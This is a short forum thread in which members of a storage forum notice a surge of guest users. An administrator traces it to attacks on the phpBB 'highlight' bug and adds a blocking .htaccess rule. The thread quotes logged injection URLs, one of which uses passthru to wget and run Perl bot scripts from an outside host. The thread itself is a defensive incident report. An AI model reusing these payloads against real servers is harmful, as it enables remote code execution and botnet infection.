"Guest" Attack?

Explorer

Learning Storage Performance
Joined
Jun 26, 2002
Messages
236
Location
Hinterlands
Code:
 In total there are 45 users online :: 0 Registered, 0 Hidden and 45 Guests   [ Administrator ]   [ Moderator ]
Most users ever online was 57 on Fri Dec 24, 2004 5:40 am
Registered Users: None

I just noticed the above when I logged in. 45 guests??? Maybe there's a hack job / probe going on!?!
 

RWIndiana

Learning Storage Performance
Joined
Oct 19, 2004
Messages
335
Location
Nirvana
In total there are 57 users online :: 1 Registered, 0 Hidden and 56 Guests

Definitely odd.
 

Handruin

Administrator
Joined
Jan 13, 2002
Messages
13,737
Location
USA
Despite having 54 users online and browsing, the load seems to be fine. Last time this happened when we broke 44 users online it was either from google, or now that I think of it, it was a link from SR. Remember the ghosting article that Mercutio posted about finding hidden space on a drive?

Has anyone posted a link somewhere that might be causing this?
 

Handruin

Administrator
Joined
Jan 13, 2002
Messages
13,737
Location
USA
We might be getting attacked for the highlight bug which is exploitable prior to phpbb 2.0.11:

I'm seeing tons of this in the logs.

"/forum/viewtopic.php?t=3660&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(11"
 

Handruin

Administrator
Joined
Jan 13, 2002
Messages
13,737
Location
USA
This does not look like a nice user: BANNED

"http://storageforum.net/forum/viewtopic.php?t=616&rush=echo%20_START_%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl
%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527"
 

Handruin

Administrator
Joined
Jan 13, 2002
Messages
13,737
Location
USA
This seemed to help in the .htaccess file using apache's mod rewrite:

Code:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$   -   [F,L]
 
Top